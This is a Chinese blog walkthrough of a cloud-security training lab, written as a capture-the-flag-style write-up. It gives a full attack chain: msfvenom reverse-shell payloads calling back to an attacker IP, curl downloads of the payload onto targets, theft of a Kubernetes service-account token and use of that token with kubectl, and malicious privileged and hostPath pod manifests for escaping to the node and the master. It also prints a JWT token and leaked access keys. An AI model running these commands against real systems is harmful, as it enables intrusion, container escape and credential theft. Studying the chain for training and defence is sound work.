云安全实训练习题WP

代码别跑

已于 2024-07-21 17:33:49 修改

阅读量831

点赞数 11

文章标签： linux 运维服务器

于 2024-07-20 23:54:34 首次发布

本文链接：https://blog.csdn.net/weixin_74381881/article/details/140576286

版权

第一题：

题目描述：

fscan扫描主机：

发现30200端口存在shrio反序列化漏洞，key为kPH+bIxk5D2deZiIxcaaaA==

利用工具尝试攻击：

命令执行：

拿到题目要求md5值：55d10e753491f79b83723ad44b17b32d。

第二题：

由于靶机实现了均衡负载，故利用msf建立稳定的连接。

制作Linux木马，ip设为vpn的ip（靶机是内网IP，要使用实训给的vpn才能登上）

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.194.108 LPORT=4446 -f elf > linux.elf

msfconsole设置并开启监听：

msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.194.108
set lport 4446
run

利用python开启一个共享文件夹，用于让靶机下载木马：

python -m http.server 8090

测试靶机能否curl访问木马文件内容：

靶机curl访问木马内容并在tmp目录下保存为linux.elf文件：

curl http://192.168.194.108:8090/linux.elf -o linux.elf

授予文件权限：

执行木马上线msf：

在msf进入shell，在tmp目录下下载工具kubectl（已将kubectl文件放入共享文件夹）：

shell
cd /tmp
ls
curl http://192.168.194.108:8090/kubectl -o ./kubectl

可以看到下载完成：

授予下载好的kubectl可执行权限：

当前已获得权限的pod是被配置了高权限的serviceAccount，故能pod能进行逃逸。

获取token：

cat /var/run/secrets/kubernetes.io/serviceaccount/token

通过环境变量，查看api-server服务器的ip地址为10.4.3.0.1（在msf的shell中不知道为什么看不到）：

利用kubectl工具用获取的token查看pods：

./kubectl --server=https://10.43.0.1 --token=eyJhbGciOiJSUzI1NiIsImtpZCI6Ik5TaU9rb05yRG1lZ2lZUm1uUks5cU9xczJPM2ZyZEh2ZmdBUDdER3JOXzAifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiLCJrM3MiXSwiZXhwIjoyMDM2NjU2MDAwLCJpYXQiOjE3MjEyOTYwMDAsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJnYW1lLWFwcCIsInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJnYW1lLWFkbWluIiwidWlkIjoiMTY1OGUxMWYtZTNkOS00MzQ2LWI0NGItODdiY2VmYzE4OTc1In19LCJuYmYiOjE3MjEyOTYwMDAsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpnYW1lLWFwcDpnYW1lLWFkbWluIn0.FCisEc7Ajr5rcExD8OWBnKrdcl52k9MjlJMM1WqqTJBBreSdTTHrUga7NQCpj_tSWc58IsmYIdRTrjwoD6ToTKofjzoaoHEe0Egtman3n5T7Y7A_JVt0tM5LrUuzTeBGc8WDrukqSMmBMrFD-KtouuHWFk9e2LOK4pIr5Ao1948p9mxC5cDgDd5TqRT9iN0DYy0FhS4H32256K1_0kXv-IpkiL5GzzTp2TjidSPrjFta06DveCDOYRBgLhp7-UBr1IJsL0_P5LgGN1lpiA5Kvv5OjouextQYKhiSgTfRD1LZgccNoQQowRDFPGmVbmmKa-CyoN2OyuyMw1Izn_0wiA --insecure-skip-tls-verify=true get pods -A

--server指定的是api-server的ip地址（env可以看到），token是cat /var/run/secrets/kubernetes.io/serviceaccount/token获得的凭证

构造一个恶意pod配置文件，该恶意pod可以将pod宿主机根目录挂载到恶意pod下的mnt目录，从而可以访问到宿主机根目录下的flag。

恶意pod配置文件：

#用于逃逸到当前的pod所在的node节点主机
apiVersion: v1
kind: Pod
metadata:
  name: test
spec:
  containers:
  - image: nginx
    name: test-container
    volumeMounts:
    - mountPath: /mnt
      name: test-volume
  volumes:
  - name: test-volume
    hostPath:

将该配置文件放到共享文件夹，在pod上用curl下载到tmp目录下：

利用kubectl工具启动这个恶意pod：

./kubectl --server=https://10.43.0.1 --token=eyJhbGciOiJSUzI1NiIsImtpZCI6Ik5TaU9rb05yRG1lZ2lZUm1uUks5cU9xczJPM2ZyZEh2ZmdBUDdER3JOXzAifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiLCJrM3MiXSwiZXhwIjoyMDM2NjU2MDAwLCJpYXQiOjE3MjEyOTYwMDAsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJnYW1lLWFwcCIsInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJnYW1lLWFkbWluIiwidWlkIjoiMTY1OGUxMWYtZTNkOS00MzQ2LWI0NGItODdiY2VmYzE4OTc1In19LCJuYmYiOjE3MjEyOTYwMDAsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpnYW1lLWFwcDpnYW1lLWFkbWluIn0.FCisEc7Ajr5rcExD8OWBnKrdcl52k9MjlJMM1WqqTJBBreSdTTHrUga7NQCpj_tSWc58IsmYIdRTrjwoD6ToTKofjzoaoHEe0Egtman3n5T7Y7A_JVt0tM5LrUuzTeBGc8WDrukqSMmBMrFD-KtouuHWFk9e2LOK4pIr5Ao1948p9mxC5cDgDd5TqRT9iN0DYy0FhS4H32256K1_0kXv-IpkiL5GzzTp2TjidSPrjFta06DveCDOYRBgLhp7-UBr1IJsL0_P5LgGN1lpiA5Kvv5OjouextQYKhiSgTfRD1LZgccNoQQowRDFPGmVbmmKa-CyoN2OyuyMw1Izn_0wiA --insecure-skip-tls-verify=true apply -f ./a.yaml

等待pod启动：

可以看到创建的名字为test这个pod成功启动。

进入test：

./kubectl --server=https://10.43.0.1 --token=eyJhbGciOiJSUzI1NiIsImtpZCI6Ik5TaU9rb05yRG1lZ2lZUm1uUks5cU9xczJPM2ZyZEh2ZmdBUDdER3JOXzAifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiLCJrM3MiXSwiZXhwIjoyMDM2NjU2MDAwLCJpYXQiOjE3MjEyOTYwMDAsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJnYW1lLWFwcCIsInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJnYW1lLWFkbWluIiwidWlkIjoiMTY1OGUxMWYtZTNkOS00MzQ2LWI0NGItODdiY2VmYzE4OTc1In19LCJuYmYiOjE3MjEyOTYwMDAsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpnYW1lLWFwcDpnYW1lLWFkbWluIn0.FCisEc7Ajr5rcExD8OWBnKrdcl52k9MjlJMM1WqqTJBBreSdTTHrUga7NQCpj_tSWc58IsmYIdRTrjwoD6ToTKofjzoaoHEe0Egtman3n5T7Y7A_JVt0tM5LrUuzTeBGc8WDrukqSMmBMrFD-KtouuHWFk9e2LOK4pIr5Ao1948p9mxC5cDgDd5TqRT9iN0DYy0FhS4H32256K1_0kXv-IpkiL5GzzTp2TjidSPrjFta06DveCDOYRBgLhp7-UBr1IJsL0_P5LgGN1lpiA5Kvv5OjouextQYKhiSgTfRD1LZgccNoQQowRDFPGmVbmmKa-CyoN2OyuyMw1Izn_0wiA --insecure-skip-tls-verify=true exec -it test -- /bin/sh

查看mnt下是否成功挂载了宿主机的根目录：

成功挂载，获取root下的flag：

第六题

利用fscan扫描靶机：

在对扫描出来的各个端口进行目录扫描的时候发现在10000端口.git文件泄漏：

利用GitHack工具下载源码：

进入保存源码的目录，搜索secretKey关键字：

发现在demo.html文件下，密钥为:PddmV2P2hNwBkTKBejAD8ni8vsh2JcHF

查看demo.html：

发现acessKey和secretKey：

第四题

通过访问fscan扫出的端口，发现minio的后台登录端口为靶机的9000：

利用demo.html中的密钥登录：

下载下来mysql.yaml文件：

mysql的密码就在里面，为CoreMysql@36

第五题

第四题知道了mysql的密码，利用MDUT工具连接数据库进行udf提取：

由于连上的数据库服务器没有curl，也没有wget命令，故采用echo+base64编码的方式写入Linux木马建立稳定的msf连接。

msfconsole设置并开启监听：

msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.194.108
set lport 4446
run

生成linux木马内容的base64编码：

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.194.108 LPORT=4446 -f elf |base64

将生成的base64字符串去掉换行

写入文件：

echo "f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAAMf9qCViZthBIidZNMclqIkFaagdaDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXsCowmxRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==" |base64 -d > pay.elf

给文件增加执行权限并执行：

chmod +x ./pay.elf;./pay.elf

成功上线：

查看环境变量：

发现api-server的IP地址为172.17.0.1

上传fscan：

在msf中进入shell，给fscan执行权限后，利用fscan扫描172.17.0.1：

发现api-server未授权访问漏洞。

exit退出shell：

上传kubectl工具对漏洞进行利用：

再次进入shell：

给kubectl增加执行权限：

进行漏洞利用，查看pods：

script -a -c bash -f /dev/null
/tmp/kubectl --server=https://172.17.0.1/ --insecure-skip-tls-verify=true get pods

由于未授权漏洞，用户名和密码随便输入就行。(script -a -c bash -f /dev/null不知道干什么的，但没有这条命令会失败不知道为什么)

接下来构造恶意pod，该pod能够将k8s-master的根目录挂载到pod的/host文件夹下。

构造恶意pod文件：

#设置污点容忍度+nodeSelector从而逃逸到master节点上
apiVersion: v1
kind: Pod
metadata:
  name: k8s-master2
spec:
  hostNetwork: true
  nodeName: k8s-master
  containers:
  - name: alpha
    image: docker.io/flannel/flannel:v0.21.4
    command: ["/sbin/init"]
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: hostvolume
  tolerations:
  - key: node-role.kubernetes.io/master    #master节点默认污点
    operator: Exists
    effect: NoSchedule
  volumes:
  - name: hostvolume
    hostPath:
      path: /
      type: Directory

将以上内容保存到xx.yaml文件中，并上传到靶机的/tmp下：

进入shell后，创建恶意pod：

查看pods

发现已经恶意pod k8s-master2已经成功启动

进入恶意pod k8s-master2：

/tmp/kubectl --server=https://172.17.0.1/ --insecure-skip-tls-verify=true exec -it k8s-master2 -- /bin/sh

查看/host是否成功挂载master的根目录：

虽然是乱码但是确实有，说明挂载成功。

将shell的根目录变成/host：

成功进入到master的根目录，查看根目录：

查看proof文件内容：

proof文件内容为67bae080cee3e75f8b9b8b2a00d21892

至此，练习结束。

代码别跑

关注

11
点赞
踩
12

收藏

觉得还不错? 一键收藏
打赏
0
评论
云安全实训练习题WP

-server指定的是api-server的ip地址（env可以看到），token是cat /var/run/secrets/kubernetes.io/serviceaccount/token获得的凭证。由于未授权漏洞，用户名和密码随便输入就行。构造一个恶意pod配置文件，该恶意pod可以将pod宿主机根目录挂载到恶意pod下的mnt目录，从而可以访问到宿主机根目录下的flag。接下来构造恶意pod，该pod能够将k8s-master的根目录挂载到pod的/host文件夹下。
复制链接

扫一扫